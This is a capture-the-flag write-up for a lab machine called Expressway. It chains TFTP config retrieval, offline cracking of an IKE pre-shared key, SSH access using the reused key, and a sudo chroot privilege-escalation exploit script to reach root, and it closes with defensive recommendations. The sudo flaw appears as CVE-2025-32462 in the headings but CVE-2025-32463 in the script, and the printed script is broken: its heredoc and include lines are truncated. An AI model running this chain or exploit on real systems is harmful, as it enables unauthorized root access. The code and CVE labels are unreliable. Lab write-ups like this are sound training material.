🚀 Expressway
Enumeration
🔍 1. Initial Setup
Started by adding the target to our hosts file for easy reference:
echo "10.129.242.197 expressway.htb" | sudo tee -a /etc/hosts🔍 2. Nmap Port Scan
Performed a comprehensive scan to identify running services:
nmap -Pn -A 10.129.242.197| Port | Service | Version | Notes |
|---|---|---|---|
| 22/tcp | SSH | OpenSSH 10.0p2 Debian 8 | Standard SSH service |
| 69/udp | TFTP | Netkit tftpd/atftpd | File transfer service |
| 500/udp | IKE | PSK + XAUTH | IPsec key exchange |
| 4500/udp | NAT-T | IPsec NAT traversal | VPN support |
🔐 3. IKE Aggressive Mode Probe
Discovered the VPN identity and authentication method:
sudo ike-scan -A --id 'ike@expressway.htb' --idtype 3 10.129.242.197
Key Findings:
- Identity:
ike@expressway.htb - Authentication: PSK (Pre-Shared Key)
- XAUTH support enabled
- Encryption: 3DES, Hash: SHA1, Group: modp1024
📁 4. TFTP File Discovery
Used Nmap's TFTP enumeration script to discover available files:
sudo nmap -sU -p 69 --script tftp-enum -Pn 10.129.242.197Found a Cisco router configuration file: ciscortr.cfg
tftp 10.129.242.197
tftp> mode binary
tftp> get ciscortr.cfg ciscortr.cfg
tftp> quit📝 5. Configuration Analysis
The Cisco configuration file revealed critical VPN settings:
- VPN Group:
rtr-remotewith keysecret-password - EZVPN Config:
group 2 key secret-password - Domain:
expressway.htb - Username:
ike(password redacted in config)
Attack Vector Identified: The configuration suggests we can crack the PSK using IKE aggressive mode, then potentially use the credentials for SSH access.
Initial Access
🔓 6. PSK Cracking Setup
Generated a PSK crack file using IKE aggressive mode:
sudo ike-scan -A --id 'ike@expressway.htb' --idtype 3 --pskcrack=psk.bin 10.129.242.197This created a psk.bin file containing the handshake data needed for offline cracking.
💥 7. Offline PSK Cracking
Used psk-crack with rockyou.txt wordlist:
psk-crack -v -d /usr/share/wordlists/rockyou.txt psk.bin
PSK Recovered:
Iterations: 8,045,040 in 9.312 seconds (863,945.15 iterations/sec)
freakingrockstarontheroad
Iterations: 8,045,040 in 9.312 seconds (863,945.15 iterations/sec)
🚪 8. SSH Access
With the recovered PSK, attempted SSH login as user 'ike':
ssh ike@10.129.242.197Successfully authenticated using the PSK as the password!
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
[USER FLAG RETRIEVED]
User Access Achieved: Successfully logged in as user 'ike' and obtained the user flag.
Privilege Escalation
🔍 9. System Enumeration
Started by checking user privileges and system information:
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ sudo -l
Sorry, user ike may not run sudo on expressway🔍 10. Sudo Version Check
Checked the sudo version for known vulnerabilities:
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Vulnerability Identified: Sudo version 1.9.17 is affected by CVE-2025-32462, a privilege escalation vulnerability.
💀 11. CVE-2025-32462 Exploitation
Created and executed an exploit script for the sudo vulnerability:
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<
#include
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?} 👑 12. Root Access
Executed the exploit and gained root privileges:
ike@expressway:~$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/# cd /root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
[ROOT FLAG RETRIEVED]
Root Access Achieved: Successfully escalated privileges to root and obtained the root flag!
Attack Chain Summary
This writeup demonstrated a straightforward attack path leveraging network service vulnerabilities and a recent sudo privilege escalation:
TFTP File Discovery
→ Cisco Configuration Analysis
→ IKE Aggressive Mode PSK Extraction
→ Offline PSK Cracking
→ SSH Access as 'ike'
→ CVE-2025-32462 Sudo Exploitation
→ Root Privilege EscalationKey Techniques Demonstrated
- TFTP Enumeration: Discovering exposed configuration files
- IKE Aggressive Mode Attack: Extracting PSK handshake for offline cracking
- Offline Password Cracking: Using wordlist attacks against network protocols
- Configuration Analysis: Mining sensitive information from network device configs
- CVE Exploitation: Leveraging recent sudo vulnerabilities for privilege escalation
Tools Used
- Nmap: Network reconnaissance and UDP service enumeration
- ike-scan: IKE aggressive mode probing and PSK extraction
- psk-crack: Offline pre-shared key cracking
- TFTP Client: File retrieval from TFTP service
- SSH: Remote shell access
- GCC: Compiling exploit code for privilege escalation
Critical Vulnerabilities Exploited
- Exposed TFTP Service: Sensitive configuration files accessible without authentication
- IKE Aggressive Mode: PSK vulnerable to offline dictionary attacks
- Weak PSK: Pre-shared key found in common wordlists
- Password Reuse: VPN PSK used as SSH password
- CVE-2025-32462: Sudo privilege escalation vulnerability
Defensive Recommendations:
- Disable or secure TFTP services - use SFTP or SCP for file transfers
- Avoid IKE Aggressive Mode - use Main Mode for VPN configurations
- Implement strong, unique pre-shared keys that resist dictionary attacks
- Avoid password reuse across different services and protocols
- Keep sudo updated and monitor for privilege escalation vulnerabilities
- Implement network segmentation to limit service exposure